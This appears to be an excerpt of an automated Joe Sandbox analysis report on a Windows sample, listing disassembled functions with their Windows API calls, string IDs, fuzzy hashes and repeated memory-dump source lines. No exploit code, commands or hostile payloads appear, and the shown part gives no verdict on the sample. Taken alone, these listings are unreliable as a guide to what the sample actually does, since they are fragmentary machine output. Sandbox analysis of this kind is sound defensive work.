                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                • Opcode ID: d136f8807852e493c751eb8a1f9fcac2364c0e2d583d48c429e49133e5d3cfc8
                • Instruction ID: c2834d815487b26675e8ab57cf3cbbb265be839120feffea3daf752e238e1eb1
                • Opcode Fuzzy Hash: d136f8807852e493c751eb8a1f9fcac2364c0e2d583d48c429e49133e5d3cfc8
                • Instruction Fuzzy Hash: 1B91D4B2208388BBD7219BA1CD49FFF77ACEB49705F00081AB749D2191D774A609DB62
                Function 004D718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D7191
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004D72F1
                • CloseHandle.KERNEL32(00000000), ref: 004D7301
                  • Part of subcall function 004D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004D7C04
                  • Part of subcall function 004D7BF5: GetLastError.KERNEL32 ref: 004D7C4A
                  • Part of subcall function 004D7BF5: CloseHandle.KERNEL32(?), ref: 004D7C59
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004D730C
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004D741A
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004D7446
                • CloseHandle.KERNEL32(?), ref: 004D7457
                • GetLastError.KERNEL32 ref: 004D7467
                • RemoveDirectoryW.KERNEL32(?), ref: 004D74B3
                • DeleteFileW.KERNEL32(?), ref: 004D74DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                • Opcode ID: cd30d83ff725659464e28ded37686b623d55ff9ef34aba8bc0ad4c6db1b7089a
                • Instruction ID: 63607c382c969fd4e4e2e87da7b3bd58ff8f2bcca869f61b49a940c754322ebb
                • Opcode Fuzzy Hash: cd30d83ff725659464e28ded37686b623d55ff9ef34aba8bc0ad4c6db1b7089a
                • Instruction Fuzzy Hash: 88B1D171904215AADF21DB60DC55BEFB7B8AF04304F0441AFF949E7342E738AA49CB65
                Function 004D3281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                • Opcode ID: bf53e31e79f052d36b7ff0e5ba3015d0634ea78c2ae7c193b22a39cc0fbc30cd
                • Instruction ID: b2329bb8c54ed9e0c7ecff27d6b5869408e3157000efd55bd20bc17383aa0f20
                • Opcode Fuzzy Hash: bf53e31e79f052d36b7ff0e5ba3015d0634ea78c2ae7c193b22a39cc0fbc30cd
                • Instruction Fuzzy Hash: 6D32D4716102849FDF14DF34C8A5AEA37A5AF15304F04447FFD8A8B382DB78AA49CB65
                Function 004FD00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 008346eae8b57b7078b2a5d522406f96acf84df3a3e5180badd1c8b02eaec6f8
                • Instruction ID: aac2432fae136a03e84a385b3b0bb9fa79e8c5e84ea924de6b18dcdb78df1575
                • Opcode Fuzzy Hash: 008346eae8b57b7078b2a5d522406f96acf84df3a3e5180badd1c8b02eaec6f8
                • Instruction Fuzzy Hash: CEC23872E0862C8FDB25CE299D407EAB7B6EB44305F1541EBD90DE7240E778AE818F45
                Function 004D27E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D27F1
                • _strlen.LIBCMT ref: 004D2D7F
                  • Part of subcall function 004E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004DB652,00000000,?,?,?,00010418), ref: 004E1396
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D2EE0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                • Opcode ID: 8dcd7948b886c94c054c4819873f1b1cd37f267cf23aafcc7cd580eefc4e22ae
                • Instruction ID: 2d783b13922b31b675ed3f9bd95d3f572368776aa8e17e2ea47df6d2b53a75a7
                • Opcode Fuzzy Hash: 8dcd7948b886c94c054c4819873f1b1cd37f267cf23aafcc7cd580eefc4e22ae
                • Instruction Fuzzy Hash: 5F6214716002448FDF19DF34C9A56EA3BE1AF64304F04457FEC9A8B382D7B8A945CB59
                Function 004F866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004F8767
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004F8771
                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 004F877E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: d1e0332fe3e5b8e61ad21eb39ff7acb992aeb4aeb7b9b0b1fdc4c8bbfde069bb
                • Instruction ID: 0db93674f4cdac912ea7bc9cf263b5d37a873cae8bd6faa97f744dad1eb3d75a
                • Opcode Fuzzy Hash: d1e0332fe3e5b8e61ad21eb39ff7acb992aeb4aeb7b9b0b1fdc4c8bbfde069bb
                • Instruction Fuzzy Hash: AB31D47590122C9BCB21DF25DC89B9DBBB8BF58310F5041EAE90CA7251EB349F858F48
                Function 004FCB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction ID: 793aa64f6fee6ed076cef18219c605e48792ae0164d26f1b502fcb01109360c4
                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction Fuzzy Hash: E0021C71E0021D9BDF14CFA9C9806AEFBF1EF88314F25416AE919E7384D735A941CB94
                Function 004EA63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004EA662
                • GetNumberFormatW.KERNEL32(00000400,00000000,?,0050E600,?,?), ref: 004EA6B1
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                • Opcode ID: 8cd1ee28647b75a82a94049cac03a2079497d854576e31dadcd388c3c588f399
                • Instruction ID: 88558ea6efc2482ad79197d3d1697c7fc906f90030174fcbaf20b59d242f5e81
                • Opcode Fuzzy Hash: 8cd1ee28647b75a82a94049cac03a2079497d854576e31dadcd388c3c588f399
                • Instruction Fuzzy Hash: BA015E36110208BADB208FA5EC06F9B77BCEF29710F104822BA04A7290D3719A69D7E5
                Function 004D6EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(004E117C,?,00000200), ref: 004D6EC9
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 004D6EEA
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                • Opcode ID: 2524b970575ad72dd9ac1c8bd60cf7093fdc41d4a89baf6a7e08b61a4f614ae4
                • Instruction ID: 6bbc6133405a97deb03d0d9573744297e0a0e4e3dae3e4a6eb4edf862937b048
                • Opcode Fuzzy Hash: 2524b970575ad72dd9ac1c8bd60cf7093fdc41d4a89baf6a7e08b61a4f614ae4
                • Instruction Fuzzy Hash: 5AD0C7353C4302BFEB110A75CC19F2B7B546765B42F10C556B356D91D0D5709019A619
                Function 00501194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0050118F,?,?,00000008,?,?,00500E2F,00000000), ref: 005013C1
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 0a89cd9d292dad7b34965f5d622d2a02cc8f7258dd822be1c1680a2b10cd251f
                • Instruction ID: e4d7588852cc0c0e2fb41c1eb869ad1123e0ac8abd3cdd00144a56ea16002352
                • Opcode Fuzzy Hash: 0a89cd9d292dad7b34965f5d622d2a02cc8f7258dd822be1c1680a2b10cd251f
                • Instruction Fuzzy Hash: B2B16D35610A098FDB15CF28C48ABA97FE0FF45364F258658E899CF2E1C335E981CB49
                Function 004D407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                • Opcode ID: 2e267b619ae39426da2b65c49e4153f43037d184bd811404fda712786c2935c2
                • Instruction ID: efaa8e9622e4d497998a70933ff176dc03278a997ccb9058cf6321fbd735dc7b
                • Opcode Fuzzy Hash: 2e267b619ae39426da2b65c49e4153f43037d184bd811404fda712786c2935c2
                • Instruction Fuzzy Hash: 6DF1C3B1A083418FD748CF2AD880A1AFBE1BFCC208F15892EF598D7711E735E9558B56
                Function 004DACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                APIs
                • GetVersionExW.KERNEL32(?), ref: 004DAD1A
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: d3fad169f5cf2a1077acdf6eded786ea8685173dbec6ced4cb4daa7cb89bb84d
                • Instruction ID: 45bfcd220ad5733d87e90f778f2cfc6bf01054d397ed7230cda4ab7419881b94
                • Opcode Fuzzy Hash: d3fad169f5cf2a1077acdf6eded786ea8685173dbec6ced4cb4daa7cb89bb84d
                • Instruction Fuzzy Hash: 96F090B090020C8FC728CF18EC566EA73B7F769301F20429AE91443394D7B4AD85DE56
                Function 004EF063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,004EEAC5), ref: 004EF068
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 556fcec379a85008496b4863e820cced58b66d5d41d87497c05f48ea618abbeb
                • Instruction ID: 2112c641617db0acb19aa00ebe305d09cf59dac1fc5b39075ea507801fecf040
                • Opcode Fuzzy Hash: 556fcec379a85008496b4863e820cced58b66d5d41d87497c05f48ea618abbeb
                • Instruction Fuzzy Hash:
                Function 004FB710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 0ff5058b80ae5bf390719d00058a03ca425551646a5788394217d542bca975bb
                • Instruction ID: 0726ee63a7060fd974c71131086ec6b4aaf8a17a3e3035b63bcd57fe31c58863
                • Opcode Fuzzy Hash: 0ff5058b80ae5bf390719d00058a03ca425551646a5788394217d542bca975bb
                • Instruction Fuzzy Hash: 9DA001B46016018BD7408FB6AA0A20D3AADAA69691709826AA509C6660EA248568AF19
                Function 004E5C77 Relevance: .8, Instructions: 800COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                • Instruction ID: cf61510421382c0c73bc56a7663c734c9187d213ec5bd48ccdd1107d29869b24
                • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                • Instruction Fuzzy Hash: 02623B316047C58FCB25CF39C9906BABBE1AF65309F05856FD89B4B342D638E945CB18
                Function 004E70BF Relevance: .8, Instructions: 773COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                • Instruction ID: f1c182b21deb3f6513cc444dbb34b1c60203c4716b40375820e2e84f11391f4c
                • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                • Instruction Fuzzy Hash: 396253706087C69FC719CF29C8805B9FBE0BF51319F04866ED9A687742D338E956CB89
                Function 004DED14 Relevance: .7, Instructions: 694COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                • Instruction ID: 0d956a7c71da3d65891af0c5d565355fb99d01de6dec33c58b40b8fd87ad500c
                • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                • Instruction Fuzzy Hash: FD5229726087058FC718CF19C891A6AF7E1FFCC304F498A2DE9859B255D734EA19CB86
                Function 004E6A7B Relevance: .5, Instructions: 509COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d464025f2d41c3b12fa4a3f6b31ff5319c46a5c4e18f5aaa96d4cb3854f0257d
                • Instruction ID: aa914cfb9e8593c38f21314c83d5aef37d4a1ee8401e32b0ad188260763d31bc
                • Opcode Fuzzy Hash: d464025f2d41c3b12fa4a3f6b31ff5319c46a5c4e18f5aaa96d4cb3854f0257d
